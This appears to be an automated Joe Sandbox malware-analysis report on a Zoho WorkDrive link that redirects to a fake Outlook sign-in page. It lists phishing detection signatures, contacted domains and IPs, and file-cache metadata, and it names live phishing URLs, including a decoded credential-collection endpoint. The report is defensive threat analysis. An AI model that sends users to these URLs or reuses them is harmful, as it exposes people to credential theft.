Edit tour

Windows Analysis Report
https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5

Overview

General Information

Sample URL:	https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5
Analysis ID:	879250
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Yara detected HtmlPhish49

Yara detected Phisher

Phishing site detected (based on image similarity)

Drops files with a non-matching file extension (content does not match file extension)

Invalid 'forgot password' link found

HTML page contains high amount of base64 encoded strings

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML body with high number of embedded images detected

HTML body contains low number of good links

HTML title does not match URL

HTML body with high number of embedded SVGs detected

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)

chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1756,i,13398586290179392038,13743596741629981899,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_166	JoeSecurity_Phisher_1	Yara detected Phisher	Joe Security
dropped/chromecache_172	JoeSecurity_HtmlPhish_49	Yara detected HtmlPhish_49	Joe Security

HTML

Source	Rule	Description	Author	Strings
2.5.pages.csv	JoeSecurity_HtmlPhish_49	Yara detected HtmlPhish_49	Joe Security
2.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Phishing site detected (based on favicon image match)

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match

File source: 2.6.pages.csv, type: HTML

Yara detected HtmlPhish49

Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_172, type: DROPPED

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_166, type: DROPPED

Phishing site detected (based on image similarity)

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: Invalid link: Forgot my password

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: Base64: AAABAAYAgIAQAAAAAABo...AAABAQAAAQEAAAEBAAA= decoded: ..............h(..f........................
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: Base64: PHN2ZyB4bWxucz0iaHR0...ZmZiOTAwIi8+PC9zdmc+ decoded: <svg xmlns="http://w...ll="#ffb900"/></svg>
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: Base64: PHN2ZyB4bWxucz0iaHR0...NDA0MDQwIi8+PC9zdmc+ decoded: <svg xmlns="http://w...ll="#404040"/></svg>
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: Base64: PHN2ZyB4bWxucz0iaHR0...Ljg1N1oiLz48L3N2Zz4= decoded: <svg xmlns="http://w...143,14.857Z"/></svg>

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: Base64 decoded: https://auc.edu.ps/moodle/sense/host/c201b10.php

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: Total embedded image size: 31111

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: Number of links: 0

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: Title: Sign in to Outlook does not match URL

Source: https://workdrive.zohoexternal.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5

HTTP Parser: Total embedded SVG size: 178496

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="author".. found
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="author".. found
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="author".. found
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="author".. found

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No favicon
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No favicon
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No favicon
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No favicon
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No favicon
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No favicon

Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="copyright".. found
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="copyright".. found
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="copyright".. found
Source: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	HTTP Parser: No <meta name="copyright".. found

Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1756,i,13398586290179392038,13743596741629981899,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1756,i,13398586290179392038,13743596741629981899,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: classification engine

Classification label: mal76.phis.win@23/117@16/57

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: Chrome Cache Entry: 145
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: Chrome Cache Entry: 145
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: Chrome Cache Entry: 145	Jump to dropped file

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5	0%	Virustotal		Browse
https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gabriells.co.za	213.175.211.37	true	false	high
accounts.google.com	142.250.181.237	true	false	high
zpublic-h2.zohopublic.com	136.143.191.16	true	false	high
auc.edu.ps	162.144.15.141	true	false	unknown
h2-stratus.zohocdn.com	185.20.209.147	true	false	unknown
pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev	104.18.3.35	true	false	unknown
filedn.com	23.109.93.100	true	false	high
zohostatic.com	204.141.32.123	true	false	unknown
euprevpub.zohocal.com	169.148.128.14	true	false	unknown
part-0017.t-0009.t-msedge.net	13.107.213.45	true	false	unknown
workdrive.zoho.com	136.143.182.84	true	false	high
code.jquery.com	69.16.175.42	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
www.google.com	142.250.185.132	true	false	high
clients.l.google.com	142.250.184.238	true	false	high
workdrive.zohoexternal.com	unknown	unknown	false	unknown
clients2.google.com	unknown	unknown	false	high
js.zohostatic.com	unknown	unknown	false	unknown
previewengine-accl.zohoexternal.com	unknown	unknown	false	unknown
static.zohocdn.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
about:blank	false	low
https://workdrive.zohoexternal.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5	false	unknown
https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	unknown	United States	15169	GOOGLEUS	false
204.141.32.123	zohostatic.com	United States	2639	ZOHO-ASUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.186.67	unknown	United States	15169	GOOGLEUS	false
34.104.35.123	unknown	United States	15169	GOOGLEUS	false
104.18.3.35	pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev	United States	13335	CLOUDFLARENETUS	false
136.143.191.16	zpublic-h2.zohopublic.com	United States	2639	ZOHO-ASUS	false
213.175.211.37	gabriells.co.za	United Kingdom	20860	IOMART-ASGB	false
169.148.128.14	euprevpub.zohocal.com	United States	158	ERI-ASUS	false
185.20.209.147	h2-stratus.zohocdn.com	Switzerland	41913	COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	false
142.250.181.234	unknown	United States	15169	GOOGLEUS	false
136.143.182.84	workdrive.zoho.com	United States	2639	ZOHO-ASUS	false
142.250.181.237	accounts.google.com	United States	15169	GOOGLEUS	false
69.16.175.42	code.jquery.com	United States	20446	HIGHWINDS3US	false
162.144.15.141	auc.edu.ps	United States	46606	UNIFIEDLAYER-AS-1US	false
13.107.213.45	part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.184.238	clients.l.google.com	United States	15169	GOOGLEUS	false
23.109.93.100	filedn.com	Netherlands	7979	SERVERS-COMUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	879250
Start date and time:	2023-05-31 16:50:04 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5
Analysis system description:	Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.win@23/117@16/57

Warnings

Excluded IPs from analysis (whitelisted): 142.250.186.67, 34.104.35.123, 142.250.181.234, 172.217.16.202, 142.250.185.170, 172.217.16.138, 172.217.18.10, 142.250.185.74, 142.250.74.202, 142.250.184.234, 142.250.186.106, 142.250.186.170, 142.250.185.138, 216.58.212.170, 142.250.186.138, 142.250.185.106, 142.250.186.42, 142.250.184.202
Excluded domains from analysis (whitelisted): edgedl.me.gvt1.com, content-autofill.googleapis.com, login.live.com, clientservices.googleapis.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: about:blank
VT rate limit hit for: https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/Forts.html
VT rate limit hit for: https://workdrive.zohoexternal.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5

Created / dropped Files

Chrome Cache Entry: 138

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64714)
Category:	downloaded
Size (bytes):	132860
Entropy (8bit):	5.337343620260386
Encrypted:	false
SSDEEP:
MD5:	367005D39C299C42E533CD316DECA6CC
SHA1:	C2B708DB1FDE00FBEAE3AD8D4A5117CB267BC93E
SHA-256:	04C14BA2A4E86578530573C13CC9F0FBEC23B17E68E3A15905A481E4C778B890
SHA-512:	8207356FAB8BA7DE476FD58B263FA86C9F711888D893E6468BD9243C9765B89678274EA7A4F752D449CBD0575D86B56667BCCD30E4277D0B513A14B88709C6FC
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/pdfjs_legacy/legacy/web/pdf_viewer-367005d39c299c42e533cd316deca6cc.js
Preview:	/*. @licstart The following is the entire license notice for the. * JavaScript code in this page. . Copyright 2022 Mozilla Foundation. . Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. . http://www.apache.org/licenses/LICENSE-2.0. . Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. . @licend The above is the entire license notice for the. * JavaScript code in this page. */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("pdfjs-dist/web/pdf_viewer",[],t):"object"==typeof exports?exports["pdfjs-di

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	51856
Entropy (8bit):	4.9768079901757725
Encrypted:	false
SSDEEP:
MD5:	CEFBBA9E47C2DDCA44631D34FFAB1082
SHA1:	5AEC5CC073BD9292F582AC6CA1407650D4F2AD68
SHA-256:	EAAEC739B88AF9E81EA90597A3F5EAAB3C13C606642647C31738F68A00D780B6
SHA-512:	06144347741190AD37846ED5053FCEE0CD2D7F7C8C53727C79E5CBDA6C9CA38AA5B9D2436B9A54B57442AABC99FBDDC600FF2E99810C63D54A47B9DA7936E9EF
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/assetMap.json
Preview:	{. "assets": {. "assets/assetMap.json": "assets/assetMap.json",. "assets/dev/client-users/add_client_users_to_teamfolder.jpg": "assets/dev/client-users/add_client_users_to_teamfolder-0ea97fa0164ef4528960e39e0f6a88b6.jpg",. "assets/dev/client-users/invite_client_users.jpg": "assets/dev/client-users/invite_client_users-accb0712a9f33463e70a4ee51a53d22d.jpg",. "assets/dev/client-users/manage_client_users.jpg": "assets/dev/client-users/manage_client_users-1ad1487c0b9fe047541bf096b58c4f8b.jpg",. "assets/dev/client-users/show_client_users_list.jpg": "assets/dev/client-users/show_client_users_list-0ad6513f85ef042857b5cbdf9eff5e0b.jpg",. "assets/dev/dashjs/dash.all.debug.js": "assets/dev/dashjs/dash.all.debug-d2acd0139d9b63fa08cd9a57c5638659.js",. "assets/dev/default_theme.css": "assets/dev/default_theme-5ff7b4508cdcb823c5206700cc16f3f6.css",. "assets/dev/gadgets_cloud_picker_theme.css": "assets/dev/gadgets_cloud_picker_theme-7769b4dcd24132e39d8ebeaf6c5d77c4.css",. "

Chrome Cache Entry: 140

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (611)
Category:	downloaded
Size (bytes):	27242
Entropy (8bit):	4.3631679730758375
Encrypted:	false
SSDEEP:
MD5:	DF3D48946E8D3F5A83608308EDBB4B86
SHA1:	47B9C40C97ABF2658DF96B1C06109324E15E1A00
SHA-256:	570A6631252B8A52DF4DE0E953AE77DBDF524DFC3637CDA2840494A0D2B49499
SHA-512:	36EC1CEC72DC3245730C813277C645525473CC5232E85CD23503B8593D90264F335E61A16D364A1E6C41922820B40BA7C0F46B19F4B91DB6A0CF5E31E778DDEA
Malicious:	false
Reputation:	low
URL:	https://pub-0ed2cf54678c464da4fec945ff68f45b.r2.dev/favicon.ico
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

Chrome Cache Entry: 141

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 67552, version 2.8978
Category:	downloaded
Size (bytes):	67552
Entropy (8bit):	7.996618211599251
Encrypted:	true
SSDEEP:
MD5:	3EC9CFFD052CD51A5475C0FBCD805509
SHA1:	E05434A0852F106A559B2AD1E98D282ABBFB3EC3
